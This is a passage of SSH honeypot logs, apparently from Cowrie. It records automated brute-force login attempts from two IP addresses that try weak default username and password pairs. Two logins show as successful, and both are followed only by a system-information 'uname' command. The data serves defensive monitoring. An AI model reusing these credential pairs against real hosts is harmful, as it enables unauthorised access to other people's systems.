,"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:58.173708Z","src_ip":"212.227.125.160","session":"dc3dcd7b6631"}
{"eventid":"cowrie.login.failed","username":"supermap","password":"supermap","message":"login attempt [supermap/supermap] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:58.395524Z","src_ip":"212.227.125.160","session":"dc3dcd7b6631"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:59.699321Z","src_ip":"212.227.125.160","session":"dc3dcd7b6631"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34980,"dst_ip":"1.2.3.4","dst_port":22,"session":"65bd98971abc","protocol":"ssh","message":"New connection: 83.168.105.65:34980 (1.2.3.4:22) [session: 65bd98971abc]","sensor":"my-vps","timestamp":"2025-08-26T11:47:02.626966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:02.628228Z","src_ip":"83.168.105.65","session":"65bd98971abc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:02.664489Z","src_ip":"83.168.105.65","session":"65bd98971abc"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:02.775017Z","src_ip":"83.168.105.65","session":"65bd98971abc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:03.814132Z","src_ip":"83.168.105.65","session":"65bd98971abc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50094,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d847d99c3cd","protocol":"ssh","message":"New connection: 212.227.125.160:50094 (1.2.3.4:22) [session: 3d847d99c3cd]","sensor":"my-vps","timestamp":"2025-08-26T11:47:04.291951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:04.306957Z","src_ip":"212.227.125.160","session":"3d847d99c3cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:04.348485Z","src_ip":"212.227.125.160","session":"3d847d99c3cd"}
{"eventid":"cowrie.login.failed","username":"newuser","password":"newuser","message":"login attempt [newuser/newuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:04.589619Z","src_ip":"212.227.125.160","session":"3d847d99c3cd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:05.681197Z","src_ip":"212.227.125.160","session":"3d847d99c3cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50864,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed6adaeb0d02","protocol":"ssh","message":"New connection: 212.227.125.160:50864 (1.2.3.4:22) [session: ed6adaeb0d02]","sensor":"my-vps","timestamp":"2025-08-26T11:47:10.427634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:10.428283Z","src_ip":"212.227.125.160","session":"ed6adaeb0d02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:10.478521Z","src_ip":"212.227.125.160","session":"ed6adaeb0d02"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:47:10.656765Z","src_ip":"212.227.125.160","session":"ed6adaeb0d02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:47:10.835989Z","src_ip":"212.227.125.160","session":"ed6adaeb0d02"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:47:10.836634Z","src_ip":"212.227.125.160","session":"ed6adaeb0d02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:10.907467Z","src_ip":"212.227.125.160","session":"ed6adaeb0d02"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:10.909389Z","src_ip":"212.227.125.160","session":"ed6adaeb0d02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51638,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce17f25836de","protocol":"ssh","message":"New connection: 212.227.125.160:51638 (1.2.3.4:22) [session: ce17f25836de]","sensor":"my-vps","timestamp":"2025-08-26T11:47:16.316041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:16.317063Z","src_ip":"212.227.125.160","session":"ce17f25836de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:16.366790Z","src_ip":"212.227.125.160","session":"ce17f25836de"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"123456","message":"login attempt [ec2-user/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:16.520698Z","src_ip":"212.227.125.160","session":"ce17f25836de"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:17.572392Z","src_ip":"212.227.125.160","session":"ce17f25836de"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":39484,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c393d1832b1","protocol":"ssh","message":"New connection: 83.168.105.65:39484 (1.2.3.4:22) [session: 6c393d1832b1]","sensor":"my-vps","timestamp":"2025-08-26T11:47:18.239788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:18.240582Z","src_ip":"83.168.105.65","session":"6c393d1832b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:18.277710Z","src_ip":"83.168.105.65","session":"6c393d1832b1"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:47:18.389446Z","src_ip":"83.168.105.65","session":"6c393d1832b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:47:18.479526Z","src_ip":"83.168.105.65","session":"6c393d1832b1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:47:18.480189Z","src_ip":"83.168.105.65","session":"6c393d1832b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:18.518608Z","src_ip":"83.168.105.65","session":"6c393d1832b1"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:18.520038Z","src_ip":"83.168.105.65","session":"6c393d1832b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52402,"dst_ip":"1.2.3.4","dst_port":22,"session":"f13f5aff26ac","protocol":"ssh","message":"New connection: 212.227.125.160:52402 (1.2.3.4:22) [session: f13f5aff26ac]","sensor":"my-vps","timestamp":"2025-08-26T11:47:22.116750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:22.117680Z","src_ip":"212.227.125.160","session":"f13f5aff26ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:22.170130Z","src_ip":"212.227.125.160","session":"f13f5aff26ac"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:22.327740Z","src_ip":"212.227.125.160","session":"f13f5aff26ac"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:23.385275Z","src_ip":"212.227.125.160","session":"f13f5aff26ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53176,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaaf76f59022","protocol":"ssh","message":"New connection: 212.227.125.160:53176 (1.2.3.4:22) [session: aaaf76f59022]","sensor":"my-vps","timestamp":"2025-08-26T11:47:27.926955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:27.928054Z","src_ip":"212.227.125.160","session":"aaaf76f59022"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:27.978636Z","src_ip":"212.227.125.160","session":"aaaf76f59022"}
{"eventid":"cowrie.login.failed","username":"fastuser","password":"fastuser","message":"login attempt [fastuser/fastuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:28.131253Z","src_ip":"212.227.125.160","session":"aaaf76f59022"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:29.381116Z","src_ip":"212.227.125.160","session":"aaaf76f59022"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53944,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cf410d320d6","protocol":"ssh","message":"New connection: 212.227.125.160:53944 (1.2.3.4:22) [session: 5cf410d320d6]","sensor":"my-vps","timestamp":"2025-08-26T11:47:33.818640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:33.820335Z","src_ip":"212.227.125.160","session":"5cf410d320d6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33752,"dst_ip":"1.2.3.4","dst_port":22,"session":"5587d5728ad7","protocol":"ssh","message":"New connection: 83.168.105.65:33752 (1.2.3.4:22) [session: 5587d5728ad7]","sensor":"my-vps","timestamp":"2025-08-26T11:47:33.821939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:33.822541Z","src_ip":"83.168.105.65","session":"5587d5728ad7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:33.859436Z","src_ip":"83.168.105.65","session":"5587d5728ad7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:33.871515Z","src_ip":"212.227.125.160","session":"5cf410d320d6"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:33.970582Z","src_ip":"83.168.105.65","session":"5587d5728ad7"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:34.065542Z","src_ip":"212.227.125.160","session":"5cf410d320d6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:35.009166Z","src_ip":"83.168.105.65","session":"5587d5728ad7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:35.116464Z","src_ip":"212.227.125.160","session":"5cf410d320d6"}
